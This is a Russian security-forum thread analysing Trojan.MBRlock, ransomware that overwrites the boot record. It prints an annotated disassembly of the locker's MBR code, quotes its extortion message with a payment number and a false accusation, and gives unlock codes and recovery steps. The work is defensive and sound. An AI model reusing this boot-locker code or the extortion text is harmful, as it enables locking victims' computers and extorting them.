Trojan.MBRlock-SMS вымогатель

Тема в разделе "Борьба с типовыми зловредами", создана пользователем iskander-k, 30 май 2011.

  1. iskander-k
    Оффлайн

    iskander-k Команда форума Супер-Модератор Ассоциация VN/VIP Преподаватель

    Сообщения:
    3.733
    Симпатии:
    3.260
    Trojan.MBRlock
    C развитием систем безопасности операционных систем и появлением всё более сложных продуктов обеспечения защиты системы не отстают и авторы вредоносных программ. Если ранее написание вирусов представляло собой определённый вид спорта и способ самоутверждения, то сейчас это - серьёзный бизнес с серьёзным оборотом. А потому, чтобы оставаться на рынке необходимо придумывать всё более и новые уловки обхода систем защиты.

    Однако, как показывает опыт, всё новое - это хорошо забытое старое. Ещё в эпоху бесплатной операционной системы от тогда ещё молодой и бескорыстной компании Microsoft - MS-DOS - существовали вирусы, поражающие загрузочный сектор. Прошло более 10 лет - и они вернулись в форме буткитов: вредоносного кода, подменяющего загрузочную запись операционной системы с целью выполнения злонамеренных операций на этапе ранней загрузки. "Злонамеренные операции" могут быть самые разные - внедрение библиотеки в адресное пространство процессов, противодействие антивирусом и многое другое. Сегодня нашей целью будет рассмотрение MBRLock - вредоносного вымогателя.

    С 2007 года получили огромное распространение "винлокеры" - вредоносные программы, целью которых была блокировка или нарушение нормальной работы системы с требованием выкупа. О них достаточно хорошо написано в одном из блогов "Лаборатории Касперского". Сегодня мы разберём код того самого винлокера, который лаборатория назвала "самым труднодоступным".

    Вначале - немного теории. Итак, загрузочные вирусы заражают загрузочный (boot) сектор или Master Boot Record (MBR) винчестера. Принцип действия загрузочных вирусов основан на алгоритмах запуска операционной системы при включении или перезагрузке компьютера - после необходимых тестов установленного оборудования (памяти, дисков и т.д.) программа системной загрузки считывает первый физический сектор загрузочного диска (A:, C: или CD-ROM в зависимости от параметров, установленных в BIOS Setup) и передает на него управление.
    В случае винчестера управление получает программа, расположенная в MBR винчестера. Эта программа анализирует таблицу разбиения диска (Disk Partition Table), вычисляет адрес активного boot-сектора (обычно этим сектором является boot-сектор диска C:), загружает его в память и передает на него управление. Получив управление, активный boot-сектор винчестера проделывает те же действия, что и boot-сектор дискеты.

    При заражении дисков загрузочные вирусы "подставляют" свой код вместо какой-либо программы, получающей управление при загрузке системы. Принцип заражения, таким образом, одинаков во всех описанных выше способах: вирус "заставляет" систему при ее перезапуске считать в память и отдать управление не оригинальному коду загрузчика, а коду вируса.

    Вирус в большинстве случаев переносит оригинальный boot-сектор (или MBR) в какой-либо другой сектор диска (например, в первый свободный). Если длина вируса больше длины сектора, то в заражаемый сектор помещается первая часть вируса, остальные части размещаются в других секторах (например, в первых свободных).

    При заражении системы программа обходит UAC (защитный функционал Windows), поэтому установка в систему происходит незаметно. После установки троянец прописывается в главную загрузочную запись и близлежащие сектора жесткого диска. В главной загрузочной записи жесткого диска после заражения появляется код, который загружает информацию с соседних секторов диска. Как следствие — на экран выводятся требования злоумышленников заплатить за разблокировку системы определённую сумму.

    В сообщении в числе прочего говорится о том, что содержимое всех дисков компьютера якобы зашифровано и попытка самостоятельно вылечить приведет якобы к уничтожению всех данных на диске. Это не соответствует действительности. В любом случае после факта заражения лечение из самой системы становится невозможным, т. к. она даже не начинает загружаться.

    При вводе верного пароля происходит восстановление исходного состояния загрузочной области диска, и загрузка установленной операционной системы происходит в обычном режиме.

    В настоящее время известно несколько модификаций Trojan.MBRlock.

    Исследование кода блокера в MBR

    Ниже приводятся дампы кода вымогателя с пояснениями по основному функционалу каждой части.

    ; Чтение сектора №9 с первого физического устройства
    ; в память по адресу 186A:0000
    Код (Text):
    00000000: BA8000        mov        dx, 00080
    00000003: B90900        mov        cx, 9
    00000006: B80102        mov        ax, 00201
    00000009: 686A18        push        0186A
    0000000C: 07            pop        es
    0000000D: 31DB            xor        bx, bx
    0000000F: CD13            int        013
    00000011: 686A18        push        0186A
    00000014: 1F            pop        ds
    ; Запуск прочитанного кода (проверка на истечение срока блокировки)
    Код (Text):
    00000015: 9A00006A18        callf        186A:0000
    0000001A: 31DB            xor        bx, bx
    0000001C: 8EDB            mov        ds, bx
    0000001E: 8EC3            mov        es, bx
    00000020: 8ED3            mov        ss, bx
    00000022: 40            inc        ax
    ; Если ах = 0, срок блокировки истек
    Код (Text):
    00000023: 0F840F01        jz        000000136
    ; Чтение сектора №3 с первого физического устройства
    ; в память по адресу 0000:1000 (для знакогенератора)
    Код (Text):
    00000027: BA8000        mov        dx, 00080
    0000002A: B90300        mov        cx, 3
    0000002D: B80302        mov        ax, 00203
    00000030: BB0010        mov        bx, 01000
    00000033: CD13            int        013
    00000035: 7305            jnc        00000003C
    ; Если ошибка чтения, вывести ‘G’
    Код (Text):
    00000037: B8470E        mov        ax, 00E47
    0000003A: CD10            int        010
    ; Загрузить знакогенератор в память (64 символа с кода 192, 16 байт на символ)
    Код (Text):
    0000003C: B80011        mov        ax, 01100
    0000003F: BD0010        mov        bp, 01000
    00000042: B94000        mov        cx, 00040
    00000045: BAC000        mov        dx, 000C0
    00000048: B710            mov        bh, 010
    0000004A: B300            mov        bl, 0
    0000004C: CD10            int        010
    ; Чтение сектора №4 с первого физического устройства
    ; в память по адресу 0000:3000 (текст сообщения вымогателя)
    Код (Text):
    0000004E: BA8000        mov        dx, 00080
    00000051: B90500        mov        cx, 5
    00000054: B80402        mov        ax, 00204
    00000057: BB0030        mov        bx, 03000
    0000005A: CD13            int        013
    0000005C: 6660            pushad
    ; Вывод сообщения на экран
    Код (Text):
    0000005E: B80113        mov        ax, 01301
    00000061: BB0C00        mov        bx, 0000C
    00000064: B93007        mov        cx, 00730
    00000067: 31D2            xor        dx, dx
    00000069: BD0030        mov        bp, 03000
    0000006C: CD10            int        010
    0000006E: 6661            popad
    00000070: 6660            pushad
    ; Вывод строки запроса кода
    Код (Text):
    00000072: B80113        mov        ax, 01301
    00000075: BB0E00        mov        bx, 0000E
    00000078: B90C00        mov        cx, 0000C
    0000007B: BA0017        mov        dx, 01700
    0000007E: BD527D        mov        bp, 07D52
    00000081: CD10            int        010
    00000083: 6661            popad
    ; Чтение символа и запись по адресу 6C00
    Код (Text):
    00000085: BF006C        mov        di, 06C00
    00000088: B400            mov        ah, 0
    0000008A: 57            push        di
    0000008B: CD16            int        016
    0000008D: 5F            pop        di
    0000008E: EB37            jmps        0000000C7
    ; Нажат Backspace
    Код (Text):
    00000090: 3C08            cmp        al, 8
    00000092: 7533            jnz        0000000C7
    00000094: 6660            pushad
    00000096: B403            mov        ah, 3
    00000098: B700            mov        bh, 0
    0000009A: 80FA0D        cmp        dl, 00D
    0000009D: CD10            int        010
    0000009F: 6661            popad
    000000A1: 76E5            jbe        000000088
    000000A3: 6660            pushad
    000000A5: B403            mov        ah, 3
    000000A7: B700            mov        bh, 0
    000000A9: CD10            int        010
    000000AB: 52            push        dx
    000000AC: FECA            dec        dl
    000000AE: B700            mov        bh,0
    000000B0: B402            mov        ah,2
    000000B2: CD10            int        010
    000000B4: B8200E        mov        ax, 00E20
    000000B7: CD10            int        010
    000000B9: 5A            pop        dx
    000000BA: FECA            dec        dl
    000000BC: B700            mov        bh,0
    000000BE: B402            mov        ah,2
    000000C0: CD10            int        010
    000000C2: 6661            popad
    000000C4: 4F            dec        di
    000000C5: EBC1            jmps        000000088
    ; == Проверка вводимых символов ==
    Код (Text):
    000000C7: 3C0D            cmp        al, 00D
    ; Если нажата клавиша Enter,
    ; сравниваем с кодом разблокировки
    Код (Text):
    000000C9: 7555            jnz        000000120
    000000CB: BEA57D        mov        si, 07DA5
    000000CE: BF006C        mov        di, 06C00
    000000D1: B500            mov        ch, 0
    000000D3: 8A0EA47D        mov        cl, [07DA4]
    000000D7: F3A6            rep        cmpsb
    000000D9: 745B            jz        000000136
    000000DB: 6660            pushad
    ; Если неверно,
    ; установить курсор в строку 17 столбец 12
    Код (Text):
    000000DD: B402            mov        ah, 2
    000000DF: B700            mov        bh, 0
    000000E1: BA0C17        mov        dx, 0170C
    000000E4: CD10            int        010
    ; записать 100 пробелов
    Код (Text):
    000000E6: B8200A        mov        ax, 00A20
    000000E9: B96400        mov        cx, 00064
    000000EC: CD10            int        010
    ; задержка в 50000h микросекунд
    Код (Text):
    000000EE: B90500        mov        cx, 5
    000000F1: 31D2            xor        dx, dx
    000000F3: B486            mov        ah, 086
    000000F5: CD15            int        015
    ; вывод сообщения об ошибке
    Код (Text):
    000000F7: B80113        mov        ax, 01301
    000000FA: BB0C00        mov        bx, 0000C
    000000FD: B90600        mov        cx, 6
    00000100: BA0018        mov        dx, 01800
    00000103: E80600        call        00000010C
    00000106: 0D4572        0Dh, ‘Error’
    ; на повторный ввод
    Код (Text):
    0000010C: 5D            pop        bp
    0000010D: CD10            int        010
    0000010F: B402            mov        ah, 2
    00000111: B700            mov        bh, 0
    00000113: BA0C17        mov        dx, 0170C
    00000116: CD10            int        010
    00000118: 6661            popad
    0000011A: BF006C        mov        di, 06C00
    0000011D: E968FF        jmp        000000088
    ; допустимы символы с кодами 32 - 126
    Код (Text):
    00000120: 3C20            cmp        al, 020
    00000122: 0F8262FF        jc        000000088
    00000126: 3C7E            cmp        al, 07E
    00000128: 0F875CFF        ja        000000088
    0000012C: AA            stosb
    0000012D: B40E            mov        ah, 00E
    0000012F: 57            push        di
    00000130: CD10            int        010
    00000132: 5F            pop        di
    00000133: E952FF        jmp        000000088
    ; введен правильный код или истек срок блокировки
    Код (Text):
    00000136: 6A00            push        0
    00000138: 07            pop        es
    ; уменьшить на 1К размер (типично для буткитов)
    Код (Text):
    00000139: FF0E1304        dec        w,[00413]
    ; получить размер доступной основной памяти
    Код (Text):
    0000013D: CD12            int        012
    ; Переводим в параграфы
    Код (Text):
    0000013F: C1E006        shl        ax, 6
    ; Копируем в начало блока 70 байт со смещения 0000015E
    ; и передаем ему управление
    Код (Text):
    00000142: 8EC0            mov        es, ax
    00000144: 31FF            xor        di, di
    00000146: BE5E7D        mov        si, 07D5E
    00000149: B94600        mov        cx, 00046
    0000014C: F3A4            rep        movsb
    0000014E: 06            push        es
    0000014F: 6A00            push        0
    00000151: CB            retf
    00000152: 45            ‘Enter code: ’
    0000015E: 6660            pushad
    00000160: B80113        mov        ax, 01301
    00000163: BB0800        mov        bx, 8
    00000166: B90E00        mov        cx, 0000E
    00000169: BA0018        mov        dx, 01800
    0000016C: E80E00        call        00000017D
    0000016F: 4C            ‘Loading OS…’, 0Dh
    0000017D: 5D            pop        bp
    0000017E: CD10            int        010
    00000180: 6661            popad
    00000182: 6A00            push        0
    00000184: 07            pop        es
    ; восстановление оригинального MBR из сектора №2
    ; и запуск нормального загрузчика
    Код (Text):
    00000185: B280            mov        dl, 080
    00000187: B90200        mov        cx, 2
    0000018A: B80102        mov        ax, 00201
    0000018D: BB007C        mov        bx, 07C00
    00000190: CD13            int        013
    00000192: B280            mov        dl, 080
    00000194: B90100        mov        cx, 1
    00000197: B80103        mov        ax, 00301
    0000019A: BB007C        mov        bx, 07C00
    0000019D: CD13            int        013
    0000019F: EA007C0000        jmpf        00000:07C00
    Код (Text):
    ; Длина кода разблокировки
    000001A4: 06
    ; Код разблокировки        
    000001A5: 3837            ‘875082’

    Ваш компьютер заблокирован за просмотр запрещенного видео порнографического
    содержания с участием несовершеннолетних. Для разблокировки Вам необходимо:
    пополнить счет абонента БИЛАЙН 89688432698 на сумму 500 руб. После оплаты,
    на выданном терминалом чеке оплаты, вы найдете код, который необходимо ввести
    в форму ввода кода расположенную ниже. После ввода кода, Ваш ПК автоматически
    разблокируется.
    Удалите все незаконно расположенные материалы с Вашего ПК после разблокировки.
    В случае отказа от оплаты все данные на вашем ПК будут безвозвратно уничтожены,
    тк представляют опасность для других пользователей сети интернет

    Код (Text):
    00001000: 6660            pushad
    00001002: E80000        call        000001005
    00001005: 5D            pop        bp
    ; Чтение регистра статуса часов реального времени
    Код (Text):
    00001006: B00B            mov        al, 00B
    00001008: E670            out        070, al
    0000100A: E471            in        al, 071
    ; Обнуление 2 бита (установка режима BCD даты)
    Код (Text):
    0000100C: 0CFB            or        al,-5
    0000100E: E671            out        071, al
    ; == Получение текущего года ==
    ; Получение века
    Код (Text):
    00001010: 31C0            xor        ax, ax
    00001012: B032            mov        al, 032
    00001014: E670            out        070, al
    00001016: E471            in        al, 071
    00001018: D410            aam        010
    0000101A: D50A            aad
    0000101C: 6BC064        imul        ax, ax, 064
    0000101F: 93            xchg        bx, ax
    ; Получение последних двух цифр года
    Код (Text):
    00001020: 31C0            xor        ax, ax
    00001022: B009            mov        al, 9
    00001024: E670            out        070, al
    00001026: E471            in        al, 071
    00001028: D410            aam        010
    0000102A: D50A            aad
    0000102C: 01C3            add        bx, ax
    ; Сравнение со словом по адресу [01188]
    ; (год = 2011 или 07DBh)
    Код (Text):
    0000102E: 8DB68301        lea        si, [bp][00183]
    00001032: 3B1C            cmp        bx,    [si]
    00001034: 7602            jbe        000001038
    ; Если год больше, установка флага снятия блокировки
    Код (Text):
    00001036: EB74            jmps        0000010AC
    00001038: 3B1C            cmp        bx, [si]
    ; Совпадение текущего года, переход к проверке текущего месяца
    Код (Text):
    0000103A: 7403            jz        00000103F
    ; Блокировка продолжается
    Код (Text):
    0000103C: 6661            popad
    0000103E: CB            retf
    0000103F: B008            mov        al, 8
    00001041: E670            out        070, al
    00001043: E471            in        al, 071
    00001045: D410            aam        010
    00001047: D50A            aad
    ; Сравнение с байтом по адресу [0118A]
    ; (месяц = 05 или май)
    Код (Text):
    00001049: 8DB68501        lea        si, [bp][00185]
    0000104D: 3A04            cmp        al, [si]
    0000104F: 7602            jbe        000001053
    ; Если месяц больше, установка флага снятия блокировки
    Код (Text):
    00001051: EB59            jmps        0000010AC
    00001053: 3A04            cmp        al, [si]
    ; Совпадение текущего месяца, переход к проверке текущей даты
    Код (Text):
    00001055: 7403            jz        00000105A
    ; Блокировка продолжается
    Код (Text):
    00001057: 6661            popad
    00001059: CB            retf
    0000105A: B007            mov        al, 7
    0000105C: E670            out        070, al
    0000105E: E471            in        al, 071
    00001060: D410            aam        010
    00001062: D50A            aad
    ; Сравнение с байтом по адресу [0118В]
    ; (дата = 22 или 16h)
    Код (Text):
    00001064: 8DB68601        lea        si, [bp][00186]
    00001068: 3A04            cmp        al, [si]
    0000106A: 7602            jbe        00000106E
    0000106C: EB3E            jmps        0000010AC
    0000106E: 3A04            cmp        al, [si]
    ; Совпадение текущей даты, переход к проверке текущего часа
    Код (Text):
    00001070: 7403            jz        000001075
    ; Блокировка продолжается
    Код (Text):
    00001072: 6661            popad
    00001074: CB            retf
    00001075: B004            mov        al, 4
    00001077: E670            out        070, al
    00001079: E471            in        al, 071
    0000107B: D410            aam        010
    0000107D: D50A            aad
    ; Сравнение с байтом по адресу [0118C]
    ; (час = 19 или 13h)
    Код (Text):
    0000107F: 678DB587010000    lea        si, [ebp][00187]
    00001086: 3A04            cmp        al, [si]
    00001088: 7602            jbe        00000108C
    0000108A: EB20            jmps        0000010AC
    0000108C: 3A04            cmp        al, [si]
    ; Совпадение текущего часа, переход к проверке текущей минуты
    Код (Text):
    0000108E: 7403            jz        000001093
    ; Блокировка продолжается
    Код (Text):
    00001090: 6661            popad
    00001092: CB            retf
    00001093: B002            mov        al, 2
    00001095: E670            out        070,al
    00001097: E471            in        al, 071
    00001099: D410            aam        010
    0000109B: D50A            aad
    ; Сравнение с байтом по адресу [0118D]
    ; (минута = 4)
    Код (Text):
    0000109D: 8DB68801        lea        si, [bp][00188]
    000010A1: 3A04            cmp        al, [si]
    000010A3: 7602            jbe        0000010A7
    000010A5: EB05            jmps        0000010AC
    ; Блокировка продолжается
    Код (Text):
    000010A7: 6661            popad
    000010A9: 31C0            xor        ax, ax
    000010AB: CB            retf
    ; Установка флага снятия блокировки
    Код (Text):
    000010AC: 6661            popad
    000010AE: B8FFFF        mov        ax,-1
    000010B1: CB            retf
    ; Этот код нигде не вызывается (возможно остался от дропера)
    Код (Text):
    000010B2: 6660            pushad
    000010B4: 9C            pushf
    000010B5: E80000        call        0000010B8
    000010B8: 5D            pop        bp
    000010B9: 31C0            xor        ax, ax
    000010BB: 9D            popf
    000010BC: 6661            popad
    000010BE: 50            push        ax
    000010BF: B020            mov        al, 020
    000010C1: E620            out        020, al
    000010C3: 58            pop        ax
    000010C4: EAE9006018        jmpf        01860:000E9
    000010C9: CF            iret

    000010E9: B40E            mov        ah, 00Eh
    000010EB: B031            mov        al, 031
    000010ED: CD10            int        010
    000010EF: EBF8            jmps        0000010E9
    000010F1: B40E            mov        ah, 00E
    000010F3: B032            mov        al, 032
    000010F5: CD10            int        010
    000010F7: EBF8            jmps        0000010F1
    000010F9: 669C            #UD(16)
    000010FB: 6660            pushad
    000010FD: 66C1C018        rol        eax, 018
    00001101: B90200        mov        cx, 2
    00001104: EB14            jmps        00000111A
    00001106: 669C            #UD(16)
    00001108: 6660            pushad
    0000110A: 66C1C010        rol        eax, 010
    0000110E: B90400        mov        cx, 4
    00001111: EB07            jmps        00000111A
    00001113: 669C            #UD(16)
    00001115: 6660            pushad
    00001117: B90800        mov        cx, 8
    0000111A: 66C1C004        rol        eax, 4
    0000111E: 6650            push        eax
    00001120: 240F            and        al, 00F
    00001122: 3C0A            cmp        al, 00A
    00001124: 7304            jnc        00000112A
    00001126: 0430            add        al, 030
    00001128: EB02            jmps        00000112C
    0000112A: 0437            add        al, 037
    0000112C: B40E            mov        ah, 00E
    0000112E: CD10            int        010
    00001130: 6658            pop        eax
    00001132: E2E6            loop        00000111A
    00001134: 6661            popad
    00001136: 669D            #UD(16)
    00001138: C3            retn
    00001139: B032            mov        al, 032
    0000113B: E83000        call        00000116E
    0000113E: B009            mov        al, 9
    00001140: E82B00        call        00000116E
    00001143: B02D            mov        al, 02D
    00001145: CD29            int        029
    00001147: B008            mov        al, 8
    00001149: E82200        call        00000116E
    0000114C: B02D            mov        al, 02D
    0000114E: CD29            int        029
    00001150: B007            mov        al, c7
    00001152: E81900        call        00000116E
    00001155: B020            mov        al, 020
    00001157: CD29            int        029
    00001159: B004            mov        al, 4
    0000115B: E81000        call        00000116E
    0000115E: B068            mov        al, 068
    00001160: CD29            int        029
    00001162: B020            mov        al, 020
    00001164: CD29            int        029
    00001166: B002            mov        al, 2
    00001168: E80300        call        00000116E
    0000116B: 6661            popad
    0000116D: CB            retf

    0000116E: E670            out        070, al
    00001170: E471            in        al, 071
    00001172: 50            push        ax
    00001173: C0E804        shr        al, 4
    00001176: 0430            add        al, 030
    00001178: AA            stosb
    00001179: 58            pop        ax
    0000117A: 240F            and        al, 00F
    0000117C: 0430            add        al, 030
    0000117E: AA            stosb
    0000117F: C3            retn
    ; Структура хранения данных блокировщика
    Код (Text):
    00001180: 44            ‘DATETIME’
    00001188: DB07
    0000118A: 05
    0000118B: 16
    0000118C: 13
    0000118D: 04

    Информация по анализу блокера предоставлена thyrex

    Необходимо учитывать, что код разблокировки можно найти в дампе "зараженного" MBR

    [​IMG]

    Что облегчает процесс поиска кода разблокировки.
    ________________________________

    Для лечения от Trojan.MBRlock: необходимо выполнить следующие рекомендации:
    1.попробовать ввести известные коды
    Код (Text):
    [LIST]
    [*]ekol
    [*]jail
    [*]777888
    [*]zpo4301
    [*]zzp0193
    [*]281056
    [*]098SWO
    [*]875082
    [*]692058
    [/LIST]
    2.Загрузить LiveCD от DrWeb или Kaspersky Rescue Disk (с обновленными базами) записать на диск и загрузив зараженный компьютер при помощи этого диска просканировать жесткий диск - найденное вылечить.

    Что касается лечения вручную - учитывая то, что судя по коду зловред не шифрует оригинальную MBR, то поможет любая утилита, способная отыскать среди секторов 1..63 любой сектор с сигнатурой в конце 55AAh и переместить его на место сектора 0, таким образом, восстановив оригинальную MBR и таблицу разделов.

    ________________________________

    ________________________________

    • Если вы можете дополнить данное описание, прошу не стеснятся и отписываться в этой теме.
     
    Последнее редактирование: 28 апр 2016
    19 пользователям это понравилось.
  2. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.455
    Симпатии:
    13.954
    От себя добавлю, что стандартный подход как fixmbr скорее всего не сработает т.к. зловредом перемещена таблица разделов.
     
    2 пользователям это понравилось.
  3. thyrex
    Оффлайн

    thyrex Команда форума Супер-Модератор Ассоциация VN/VIP

    Сообщения:
    2.475
    Симпатии:
    3.099
    Таблица разделов начинается со смещения 1B0

    Она не перемещена и даже не повреждена. По крайней мере пока
    Но попадались сообщения, что fixmbr не помогает. Может по причине отсутствия у пользователей специфических умений по ее применению
     
    1 человеку нравится это.
  4. Rashevskiy
    Оффлайн

    Rashevskiy Активный пользователь

    Сообщения:
    142
    Симпатии:
    381
    Интересный обзор, спасибо :)
     
    1 человеку нравится это.
  5. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.455
    Симпатии:
    13.954
    http://vms.drweb.com/virus/?i=589788 - тогда немного непонятно это описание.

    Добавлено через 1 минуту 4 секунды
    http://forum.drweb.com/index.php?showtopic=302460&view=findpost&p=520922

    Добавлено через 2 минуты 5 секунд
    Так или иначе лучше обратиться к использованию LiveCD (ЛК или DrWeb-возможно) в которые вшиты "лечилки". Если не помогли коды разблокировки.
     
  6. thyrex
    Оффлайн

    thyrex Команда форума Супер-Модератор Ассоциация VN/VIP

    Сообщения:
    2.475
    Симпатии:
    3.099
    Это другая разновидность
     
    1 человеку нравится это.
  7. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.455
    Симпатии:
    13.954
    Ну и славно. Лечиться легче :)
     
  8. iskander-k
    Оффлайн

    iskander-k Команда форума Супер-Модератор Ассоциация VN/VIP Преподаватель

    Сообщения:
    3.733
    Симпатии:
    3.260
    Да другая , но принцип в общем-то тот же самый .....

    Добавлено через 14 минут 7 секунд
    Еще данный о трояне
    Trojan.MBRlock (output.exe)
    [[​IMG]
    This trojan blocker ( MD5: 1a0f12cc7736b07fb153733c7494d76e ) prevents all software execution.
    To remove the Trojan (and unlock windows), infected users need to enter a valid serial number.
    output.exe VirusTotal: https://www.virustotal.com/file-sca...49b13b384b49d5456316f3b1a2fe19b9ec-1303456070

    The main executable modify your MBR and launch a reboot procedure, when rebooted you see this:
    [​IMG]
    It says after three days the unlock is not possible, but it's alway possible.
    That just a way to scare user and push them to call the service.
    For unlock your computer, enter any 14 chars (or more) serial.
    Example: XYLIBOXXYLIBOX
    Just after having typed Enter (al = 0d in key code), it check the lenght of your serial (value in DI) and that all.

    The original MBR is not lost.

    [​IMG]
    When a valid serial is entered, the infected part is gone
    [​IMG]
     
    Последнее редактирование: 31 май 2011
    3 пользователям это понравилось.
  9. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.455
    Симпатии:
    13.954
    [INFO]Часть постов перенес в эту тему[/INFO]
     
  10. zerikua
    Оффлайн

    zerikua Активный пользователь

    Сообщения:
    34
    Симпатии:
    23
    довольно спорное заявление мы тоже изучали данный вопрос и результаты можно посмотреть тут:

    [INFO]результаты можно запостить без лишней рекламы других ресурсов, что запрещено правилами.[/INFO]
     
    Последнее редактирование модератором: 3 июн 2011
  11. gjf
    Оффлайн

    gjf Ассоциация VN Разработчик

    Сообщения:
    639
    Симпатии:
    823
    3 пользователям это понравилось.
  12. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.455
    Симпатии:
    13.954
    Может быть, а может и параллельное исследование. :)
     
  13. gjf
    Оффлайн

    gjf Ассоциация VN Разработчик

    Сообщения:
    639
    Симпатии:
    823
    Я не о том. Конечно, это не плагиат. Но просто когда публикуешь что-то на внешнем тематическом ресурсе - поиск никто не отменял, всегда есть вероятность, что ты опоздал и твоё исследование уже изжёвано вдоль и поперёк.

    Ребятам бы лучше такую инфу у себя писать, а то поищешь - и как-то печально становится:

     
    3 пользователям это понравилось.
  14. Саныч
    Оффлайн

    Саныч Активный пользователь

    Сообщения:
    869
    Симпатии:
    1.697
    Только со временем не совпадает :) Бывает
     
  15. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.455
    Симпатии:
    13.954
    Прочел статью еще раз. Но как извлечь код для разблокировки я так и не увидел.
     
  16. iskander-k
    Оффлайн

    iskander-k Команда форума Супер-Модератор Ассоциация VN/VIP Преподаватель

    Сообщения:
    3.733
    Симпатии:
    3.260
    При помощи
     
  17. gjf
    Оффлайн

    gjf Ассоциация VN Разработчик

    Сообщения:
    639
    Симпатии:
    823
    Ну да. Название статьи, её тема и то, что просили осветить было наконец-то освещено одним предложением в пост-скриптуме после нескольких страниц не по теме ;)
     
  18. iskander-k
    Оффлайн

    iskander-k Команда форума Супер-Модератор Ассоциация VN/VIP Преподаватель

    Сообщения:
    3.733
    Симпатии:
    3.260
    Легкий обзор по нескольким статьям (почти одинакового содержания)
    и комментарий на

    ну так статью -то нужно было там написать и пояснения полезны к этому зверю. И если бы еще и показали скрин с этим самым ключом было бы тоже здорово.
     
  19. thyrex
    Оффлайн

    thyrex Команда форума Супер-Модератор Ассоциация VN/VIP

    Сообщения:
    2.475
    Симпатии:
    3.099
    Вот сейчас в 911 у одного с помощью Alkid Live CD и TDSSkiller получил карантин MBR

    Код разблока
     
  20. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.455
    Симпатии:
    13.954
    Обновил шапку.
     

Поделиться этой страницей